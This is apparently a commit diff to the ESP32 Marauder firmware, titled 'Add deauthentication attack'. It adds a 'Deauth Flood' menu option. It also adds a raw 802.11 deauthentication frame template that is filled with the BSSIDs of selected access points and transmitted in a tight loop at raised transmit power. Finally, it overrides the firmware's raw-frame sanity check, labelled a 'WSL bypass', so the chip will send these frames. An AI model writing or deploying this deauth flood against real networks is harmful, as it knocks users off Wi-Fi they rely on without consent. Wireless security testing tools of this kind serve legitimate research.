Add deauthentication attack

esp32_marauder/MenuFunctions.cpp

@@ -673,6 +673,7 @@ void MenuFunctions::main(uint32_t currentTime)
   if ((wifi_scan_obj.currentScanMode != WIFI_SCAN_OFF ) &&
       (wifi_scan_obj.currentScanMode != WIFI_ATTACK_BEACON_SPAM) &&
       (wifi_scan_obj.currentScanMode != WIFI_ATTACK_AUTH) &&
+      (wifi_scan_obj.currentScanMode != WIFI_ATTACK_DEAUTH) &&
       (wifi_scan_obj.currentScanMode != WIFI_ATTACK_MIMIC) &&
       (wifi_scan_obj.currentScanMode != WIFI_ATTACK_RICK_ROLL))
       //(wifi_scan_obj.currentScanMode != WIFI_ATTACK_BEACON_LIST))
@@ -713,6 +714,7 @@ void MenuFunctions::main(uint32_t currentTime)
         (wifi_scan_obj.currentScanMode == WIFI_SCAN_DEAUTH) ||
         (wifi_scan_obj.currentScanMode == WIFI_ATTACK_BEACON_SPAM) ||
         (wifi_scan_obj.currentScanMode == WIFI_ATTACK_AUTH) ||
+        (wifi_scan_obj.currentScanMode == WIFI_ATTACK_DEAUTH) ||
         (wifi_scan_obj.currentScanMode == WIFI_ATTACK_MIMIC) ||
         (wifi_scan_obj.currentScanMode == WIFI_ATTACK_RICK_ROLL) ||
         (wifi_scan_obj.currentScanMode == WIFI_ATTACK_BEACON_LIST) ||
@@ -739,6 +741,7 @@ void MenuFunctions::main(uint32_t currentTime)
   // This is for when on a menu
   if ((wifi_scan_obj.currentScanMode != WIFI_ATTACK_BEACON_SPAM) &&
       (wifi_scan_obj.currentScanMode != WIFI_ATTACK_AUTH) &&
+      (wifi_scan_obj.currentScanMode != WIFI_ATTACK_DEAUTH) &&
       (wifi_scan_obj.currentScanMode != WIFI_ATTACK_MIMIC) &&
       (wifi_scan_obj.currentScanMode != WIFI_ATTACK_RICK_ROLL))
       //(wifi_scan_obj.currentScanMode != WIFI_ATTACK_BEACON_LIST))
@@ -1215,6 +1218,11 @@ void MenuFunctions::RunSetup()
     this->drawStatusBar();
     wifi_scan_obj.StartScan(WIFI_ATTACK_AUTH, TFT_RED);
   });
+  addNodes(&wifiAttackMenu, "Deauth Flood", TFT_RED, NULL, DEAUTH_SNIFF, [this]() {
+    display_obj.clearScreen();
+    this->drawStatusBar();
+    wifi_scan_obj.StartScan(WIFI_ATTACK_DEAUTH, TFT_RED);
+  });
   //addNodes(&wifiAttackMenu, "AP Mimic Flood", TFT_PURPLE, NULL, DEAUTH_SNIFF, [this]() {
   //  display_obj.clearScreen();
   //  this->drawStatusBar();

esp32_marauder/Web.cpp

@@ -69,7 +69,7 @@ void Web::setupOTAupdate()
   Serial.println(wifi_scan_obj.freeRAM());
 
   Serial.println("Starting softAP...");
-  esp_wifi_set_mac(ESP_IF_WIFI_AP, &newMACAddress[0]);
+  esp_wifi_set_mac(WIFI_IF_AP, &newMACAddress[0]);
   WiFi.softAP(ssid, password);
   Serial.println("");
 

esp32_marauder/WiFiScan.cpp

@@ -11,9 +11,12 @@ int num_eapol = 0;
 LinkedList<ssid>* ssids;
 LinkedList<AccessPoint>* access_points;
 
-int ieee80211_raw_frame_sanity_check(int32_t arg, int32_t arg2, int32_t arg3){
+extern "C" int ieee80211_raw_frame_sanity_check(int32_t arg, int32_t arg2, int32_t arg3){
-    printf("Sanity check bypass called!\n");
+    //printf("Sanity check bypass called!: %d, %d, %d\n", arg, arg2, arg3);
-    return 0;
+    if (arg == 31337)
+      return 1;
+    else
+      return 0;
 }
 
 class bluetoothScanAllCallback: public BLEAdvertisedDeviceCallbacks {
@@ -142,10 +145,15 @@ WiFiScan::WiFiScan()
 }*/
 
 void WiFiScan::RunSetup() {
+  if (ieee80211_raw_frame_sanity_check(31337, 0, 0) == 1)
+    this->wsl_bypass_enabled = true;
+  else
+    this->wsl_bypass_enabled = false;
+    
   ssids = new LinkedList<ssid>();
   access_points = new LinkedList<AccessPoint>();
-  BLEDevice::init("");
+  NimBLEDevice::init("");
-  pBLEScan = BLEDevice::getScan(); //create new scan
+  pBLEScan = NimBLEDevice::getScan(); //create new scan
   this->ble_initialized = true;
   
   this->shutdownBLE();
@@ -278,6 +286,8 @@ void WiFiScan::StartScan(uint8_t scan_mode, uint16_t color)
     RunRickRoll(scan_mode, color);
   else if (scan_mode == WIFI_ATTACK_AUTH)
     RunProbeFlood(scan_mode, color);
+  else if (scan_mode == WIFI_ATTACK_DEAUTH)
+    RunDeauthFlood(scan_mode, color);
   else if (scan_mode == BT_SCAN_ALL)
     RunBluetoothScan(scan_mode, color);
   else if (scan_mode == BT_SCAN_SKIMMERS)
@@ -354,6 +364,7 @@ void WiFiScan::StopScan(uint8_t scan_mode)
   (currentScanMode == WIFI_ATTACK_BEACON_LIST) ||
   (currentScanMode == WIFI_ATTACK_BEACON_SPAM) ||
   (currentScanMode == WIFI_ATTACK_AUTH) ||
+  (currentScanMode == WIFI_ATTACK_DEAUTH) ||
   (currentScanMode == WIFI_ATTACK_MIMIC) ||
   (currentScanMode == WIFI_ATTACK_RICK_ROLL) ||
   (currentScanMode == WIFI_PACKET_MONITOR) ||
@@ -403,7 +414,7 @@ String WiFiScan::getStaMAC()
   esp_wifi_set_storage(WIFI_STORAGE_RAM);
   esp_wifi_set_mode(WIFI_MODE_NULL);
   esp_wifi_start();
-  esp_err_t mac_status = esp_wifi_get_mac(ESP_IF_WIFI_STA, mac);
+  esp_err_t mac_status = esp_wifi_get_mac(WIFI_IF_AP, mac);
   this->wifi_initialized = true;
   sprintf(macAddrChr, 
           "%02X:%02X:%02X:%02X:%02X:%02X",
@@ -427,7 +438,7 @@ String WiFiScan::getApMAC()
   esp_wifi_set_storage(WIFI_STORAGE_RAM);
   esp_wifi_set_mode(WIFI_MODE_NULL);
   esp_wifi_start();
-  esp_err_t mac_status = esp_wifi_get_mac(ESP_IF_WIFI_AP, mac);
+  esp_err_t mac_status = esp_wifi_get_mac(WIFI_IF_AP, mac);
   this->wifi_initialized = true;
   sprintf(macAddrChr, 
           "%02X:%02X:%02X:%02X:%02X:%02X",
@@ -445,8 +456,8 @@ String WiFiScan::getApMAC()
 String WiFiScan::freeRAM()
 {
   char s[150];
-  sprintf(s, "RAM Free: %u bytes", system_get_free_heap_size());
+  sprintf(s, "RAM Free: %u bytes", esp_get_free_heap_size());
-  this->free_ram = String(system_get_free_heap_size());
+  this->free_ram = String(esp_get_free_heap_size());
   return String(s);
 }
 
@@ -601,6 +612,13 @@ void WiFiScan::RunInfo()
   display_obj.tft.setTextColor(TFT_CYAN);
   display_obj.tft.println("     Firmware: Marauder");
   display_obj.tft.println("      Version: " + display_obj.version_number + "\n");
+  display_obj.tft.println("      ESP-IDF: " + (String)esp_get_idf_version());
+
+  if (this->wsl_bypass_enabled)
+    display_obj.tft.println("   WSL Bypass: enabled\n");
+  else
+    display_obj.tft.println("   WSL Bypass: disabled\n");
+    
   display_obj.tft.println("  Station MAC: " + sta_mac);
   display_obj.tft.println("       AP MAC: " + ap_mac);
   display_obj.tft.println("     " + free_ram);
@@ -903,6 +921,36 @@ void WiFiScan::RunProbeFlood(uint8_t scan_mode, uint16_t color) {
   //Serial.println("End of func");
 }
 
+void WiFiScan::RunDeauthFlood(uint8_t scan_mode, uint16_t color) {
+  display_obj.TOP_FIXED_AREA_2 = 48;
+  display_obj.tteBar = true;
+  display_obj.print_delay_1 = 15;
+  display_obj.print_delay_2 = 10;
+  //display_obj.clearScreen();
+  display_obj.initScrollValues(true);
+  display_obj.tft.setTextWrap(false);
+  display_obj.tft.setTextColor(TFT_BLACK, color);
+  display_obj.tft.fillRect(0,16,240,16, color);
+  display_obj.tft.drawCentreString(" Deauth Flood ",120,16,2);
+  display_obj.touchToExit();
+  display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
+  packets_sent = 0;
+  //esp_wifi_set_mode(WIFI_MODE_STA);
+  //WiFi.mode(WIFI_AP_STA);
+  esp_wifi_init(&cfg);
+  esp_wifi_set_storage(WIFI_STORAGE_RAM);
+  //WiFi.mode(WIFI_AP_STA);
+  esp_wifi_set_mode(WIFI_AP_STA);
+  esp_wifi_start();
+  esp_wifi_set_promiscuous_filter(NULL);
+  esp_wifi_set_promiscuous(true);
+  esp_wifi_set_max_tx_power(78);
+  this->wifi_initialized = true;
+  initTime = millis();
+  //display_obj.clearScreen();
+  //Serial.println("End of func");
+}
+
 // Function to prepare for beacon spam
 void WiFiScan::RunBeaconSpam(uint8_t scan_mode, uint16_t color)
 {
@@ -1081,9 +1129,9 @@ void WiFiScan::RunBluetoothScan(uint8_t scan_mode, uint16_t color)
 
   Serial.println("BT Controller Status: " + (String)esp_bt_controller_get_status());
   */
-  
+  NimBLEDevice::setScanFilterMode(CONFIG_BTDM_SCAN_DUPL_TYPE_DEVICE);
-  BLEDevice::init("");
+  NimBLEDevice::init("");
-  pBLEScan = BLEDevice::getScan(); //create new scan
+  pBLEScan = NimBLEDevice::getScan(); //create new scan
   if (scan_mode == BT_SCAN_ALL)
   {
     display_obj.TOP_FIXED_AREA_2 = 48;
@@ -1097,7 +1145,7 @@ void WiFiScan::RunBluetoothScan(uint8_t scan_mode, uint16_t color)
     display_obj.touchToExit();
     display_obj.tft.setTextColor(TFT_CYAN, TFT_BLACK);
     display_obj.setupScrollArea(display_obj.TOP_FIXED_AREA_2, BOT_FIXED_AREA);
-    pBLEScan->setAdvertisedDeviceCallbacks(new bluetoothScanAllCallback());
+    pBLEScan->setAdvertisedDeviceCallbacks(new bluetoothScanAllCallback(), false);
     //bluetoothScanAllCallback myCallbacks;
     //pBLEScan->setAdvertisedDeviceCallbacks(&myCallbacks);
   }
@@ -1115,12 +1163,13 @@ void WiFiScan::RunBluetoothScan(uint8_t scan_mode, uint16_t color)
     display_obj.twoPartDisplay("Scanning for\nBluetooth-enabled skimmers\nHC-03, HC-05, and HC-06...");
     display_obj.tft.setTextColor(TFT_BLACK, TFT_DARKGREY);
     display_obj.setupScrollArea(display_obj.TOP_FIXED_AREA_2, BOT_FIXED_AREA);
-    pBLEScan->setAdvertisedDeviceCallbacks(new bluetoothScanSkimmersCallback());
+    pBLEScan->setAdvertisedDeviceCallbacks(new bluetoothScanSkimmersCallback(), false);
   }
   pBLEScan->setActiveScan(true); //active scan uses more power, but get results faster
-  pBLEScan->setInterval(100);
+  pBLEScan->setInterval(97);
-  pBLEScan->setWindow(99);  // less or equal setInterval value
+  pBLEScan->setWindow(37);  // less or equal setInterval value
-  pBLEScan->start(0, scanCompleteCB);
+  pBLEScan->setMaxResults(0);
+  pBLEScan->start(0, scanCompleteCB, false);
   Serial.println("Started BLE Scan");
   this->ble_initialized = true;
   initTime = millis();
@@ -1956,6 +2005,42 @@ void WiFiScan::sendProbeAttack(uint32_t currentTime) {
   }
 }
 
+void WiFiScan::sendDeauthAttack(uint32_t currentTime) {
+  // Itterate through all access points in list
+  for (int i = 0; i < access_points->size(); i++) {
+
+    // Check if active
+    if (access_points->get(i).selected) {
+      this->set_channel = access_points->get(i).channel;
+      esp_wifi_set_channel(this->set_channel, WIFI_SECOND_CHAN_NONE);
+      delay(1);
+      
+      // Build packet
+      
+      deauth_frame_default[10] = access_points->get(i).bssid[0];
+      deauth_frame_default[11] = access_points->get(i).bssid[1];
+      deauth_frame_default[12] = access_points->get(i).bssid[2];
+      deauth_frame_default[13] = access_points->get(i).bssid[3];
+      deauth_frame_default[14] = access_points->get(i).bssid[4];
+      deauth_frame_default[15] = access_points->get(i).bssid[5];
+
+      deauth_frame_default[16] = access_points->get(i).bssid[0];
+      deauth_frame_default[17] = access_points->get(i).bssid[1];
+      deauth_frame_default[18] = access_points->get(i).bssid[2];
+      deauth_frame_default[19] = access_points->get(i).bssid[3];
+      deauth_frame_default[20] = access_points->get(i).bssid[4];
+      deauth_frame_default[21] = access_points->get(i).bssid[5];      
+
+      // Send packet
+      esp_wifi_80211_tx(WIFI_IF_AP, deauth_frame_default, sizeof(deauth_frame_default), false);
+      esp_wifi_80211_tx(WIFI_IF_AP, deauth_frame_default, sizeof(deauth_frame_default), false);
+      esp_wifi_80211_tx(WIFI_IF_AP, deauth_frame_default, sizeof(deauth_frame_default), false);
+
+      packets_sent = packets_sent + 3;
+    }
+  }
+}
+
 
 void WiFiScan::wifiSnifferCallback(void* buf, wifi_promiscuous_pkt_type_t type)
 {
@@ -2630,6 +2715,24 @@ void WiFiScan::main(uint32_t currentTime)
       packets_sent = 0;
     }
   }
+  else if (currentScanMode == WIFI_ATTACK_DEAUTH) {
+    for (int i = 0; i < 55; i++)
+      this->sendDeauthAttack(currentTime);
+
+    if (currentTime - initTime >= 1000) {
+      initTime = millis();
+      String displayString = "";
+      String displayString2 = "";
+      displayString.concat("packets/sec: ");
+      displayString.concat(packets_sent);
+      for (int x = 0; x < STANDARD_FONT_CHAR_LIMIT; x++)
+        displayString2.concat(" ");
+      display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
+      display_obj.showCenterText(displayString2, 160);
+      display_obj.showCenterText(displayString, 160);
+      packets_sent = 0;
+    }
+  }
   else if ((currentScanMode == WIFI_ATTACK_MIMIC)) {
     // Need this for loop because getTouch causes ~10ms delay
     // which makes beacon spam less effective

esp32_marauder/WiFiScan.h

@@ -9,7 +9,7 @@
 
 // Testing NimBLE
 #include <NimBLEDevice.h>
-#include <NimBLEAdvertisedDevice.h>
+//#include <NimBLEAdvertisedDevice.h>
 
 #include <WiFi.h>
 #include <math.h>
@@ -49,6 +49,7 @@
 #define LV_SELECT_AP 17
 #define WIFI_ATTACK_AUTH 18
 #define WIFI_ATTACK_MIMIC 19
+#define WIFI_ATTACK_DEAUTH 20
 
 #define GRAPH_REFRESH 100
 
@@ -61,7 +62,7 @@ extern BatteryInterface battery_obj;
 extern TemperatureInterface temp_obj;
 
 esp_err_t esp_wifi_80211_tx(wifi_interface_t ifx, const void *buffer, int len, bool en_sys_seq);
-int ieee80211_raw_frame_sanity_check(int32_t arg, int32_t arg2, int32_t arg3);
+//int ieee80211_raw_frame_sanity_check(int32_t arg, int32_t arg2, int32_t arg3);
 
 struct ssid {
   String essid;
@@ -91,6 +92,8 @@ class WiFiScan
 
     bool do_break = false;
 
+    bool wsl_bypass_enabled = false;
+
     //int num_beacon = 0; // GREEN
     //int num_probe = 0; // BLUE
     //int num_deauth = 0; // RED
@@ -100,7 +103,7 @@ class WiFiScan
     int bluetoothScanTime = 5;
     int packets_sent = 0;
     const wifi_promiscuous_filter_t filt = {.filter_mask=WIFI_PROMIS_FILTER_MASK_MGMT | WIFI_PROMIS_FILTER_MASK_DATA};
-    BLEScan* pBLEScan;
+    NimBLEScan* pBLEScan;
 
     //String connected_network = "";
     String alfa = "1234567890qwertyuiopasdfghjkklzxcvbnm QWERTYUIOPASDFGHJKLZXCVBNM_";
@@ -130,8 +133,8 @@ class WiFiScan
     } __attribute__((packed)) WifiMgmtHdr;
     
     typedef struct {
-      WifiMgmtHdr hdr;
       uint8_t payload[0];
+      WifiMgmtHdr hdr;
     } wifi_ieee80211_packet_t;
 
     // barebones packet
@@ -183,6 +186,14 @@ class WiFiScan
                                   /* SSID */
                                   };
 
+    uint8_t deauth_frame_default[26] = {
+                              0xc0, 0x00, 0x3a, 0x01,
+                              0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
+                              0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+                              0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+                              0xf0, 0xff, 0x02, 0x00
+                          };
+
     void packetMonitorMain(uint32_t currentTime);
     void eapolMonitorMain(uint32_t currentTime);
     void changeChannel();
@@ -193,6 +204,7 @@ class WiFiScan
     void tftDrawColorKey();
     void tftDrawGraphObjects();
     void sendProbeAttack(uint32_t currentTime);
+    void sendDeauthAttack(uint32_t currentTime);
     void broadcastRandomSSID(uint32_t currentTime);
     void broadcastCustomBeacon(uint32_t current_time, ssid custom_ssid);
     void broadcastSetSSID(uint32_t current_time, char* ESSID);
@@ -200,6 +212,7 @@ class WiFiScan
     void RunRickRoll(uint8_t scan_mode, uint16_t color);
     void RunBeaconSpam(uint8_t scan_mode, uint16_t color);
     void RunProbeFlood(uint8_t scan_mode, uint16_t color);
+    void RunDeauthFlood(uint8_t scan_mode, uint16_t color);
     void RunMimicFlood(uint8_t scan_mode, uint16_t color);
     void RunBeaconList(uint8_t scan_mode, uint16_t color);
     void RunEspressifScan(uint8_t scan_mode, uint16_t color);

esp32_marauder/esp32_marauder.ino

@@ -186,9 +186,9 @@ void setup()
   digitalWrite(TFT_BL, HIGH);
   */
 
-  esp_obj.begin();
+  //esp_obj.begin();
   
-  a32u4_obj.begin(); // This goes last to make sure nothing is messed up when reading serial
+  //a32u4_obj.begin(); // This goes last to make sure nothing is messed up when reading serial
 
   display_obj.tft.println(F("Starting..."));
 
@@ -216,8 +216,8 @@ void loop()
     sd_obj.main();
     battery_obj.main(currentTime);
     temp_obj.main(currentTime);
-    esp_obj.main(currentTime);
+    //esp_obj.main(currentTime);
-    a32u4_obj.main(currentTime);
+    //a32u4_obj.main(currentTime);
     //led_obj.main(currentTime);
     //if ((wifi_scan_obj.currentScanMode != WIFI_ATTACK_BEACON_SPAM))
     if ((wifi_scan_obj.currentScanMode != WIFI_PACKET_MONITOR) &&
@@ -235,7 +235,7 @@ void loop()
   else if (wifi_scan_obj.currentScanMode == ESP_UPDATE) {
     display_obj.main(wifi_scan_obj.currentScanMode);
     menu_function_obj.main(currentTime);
-    esp_obj.program();
+    //esp_obj.program();
     delay(1);
   }
   //else